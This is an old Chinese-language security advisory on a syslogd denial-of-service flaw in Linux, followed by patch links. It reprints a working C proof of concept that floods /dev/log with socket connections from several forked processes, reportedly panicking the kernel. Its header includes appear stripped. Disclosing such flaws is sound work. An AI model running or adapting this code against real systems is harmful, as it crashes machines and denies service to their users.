linux的syslog问题发布时间:1999-10-24 更新时间:1999-10-24 严重程度:中 威胁程度:远程拒绝服务 错误类型:意外情况处置错误 利用方式:服务器模式 受影响系统 Linux详细描述 Syslogd使用一个unix domain stream socket (/dev/log)来接受系统日志信息。 Unix domain stream sockets 需要一个服务器和客户端的连接,即每个客户端的都要创建一个单独的连接。 如果短时间内产生大量的本地 syslog连接,会造成系统的拒绝服务问题。 一个或少数几个连接不会导致不响应,由于syslog使用了select()调用同步管理连接。但在如下代码中,使用2000个连接到 syslog,使用多个进程,会马上引起死机并产生如下信息:'Kernel panic: can't push onto full stack' 测试代码 /* * * shutup - syslogd 1.3 denial of service * by Mixter * * This opens up to 2000 unix domain socket connections * to /dev/log, attempting to stop syslog from responding. * WARNING: This apparently causes the kernel to panic! * You might have to run this 2 times to reproduce it as non-root. * This code is for educational purposes only, do not abuse. * */ #include #include #include #include #include #define PATH "/dev/log" #define SHUTUPS 200 #define PROCS 10 int main (void) { int s, i; struct sockaddr_un sun; char host[128]; sun.sun_family = AF_UNIX; strncpy (sun.sun_path, PATH, 100); gethostname (host, 128); printf ("shutup - syslog1.3 DoS (c) Mixter - http://1337.tsx.org\n"); printf ("syslog on %s is now being overloaded...\n", host); if (fork ()) exit (0); for (i = 0; i < PROCS; i++) if (fork () == 0) break; for (i = 0; i < SHUTUPS; i++) { if ((s = socket (AF_UNIX, SOCK_STREAM, 0)) < 0) { perror ("socket"); while (1); } if (connect (s, (struct sockaddr *) &sun, sizeof (struct sockaddr)) < 0) { perror ("connect"); close (s); i--; } } while (1); } 解决方案 下载补丁: S.u.S.E. Linux: ftp://ftp.suse.com/pub/suse/axp/update/6.1/a1/sys logd-1.3.33-9.alpha.rpm ftp://ftp.suse.com/pub/suse/i386/update/5.3/a1/sy slogd-1.3.33-9.i386.rpm ftp://ftp.suse.com/pub/suse/i386/update/6.1/a1/sy slogd-1.3.33-9.i386.rpm ftp://ftp.suse.com/pub/suse/i386/update/6.2/a1/sy slogd-1.3.33-9.i386.rpm ftp://ftp.suse.com/pub/suse/i386/update/6.3/a1/sy slogd-1.3.33-9.i386.rpm S.u.S.E. Mirror Listing: http://www.suse.de/de/support/download/ftp/inland .html http://www.suse.de/de/support/download/ftp/auslan d.html 相关信息 |
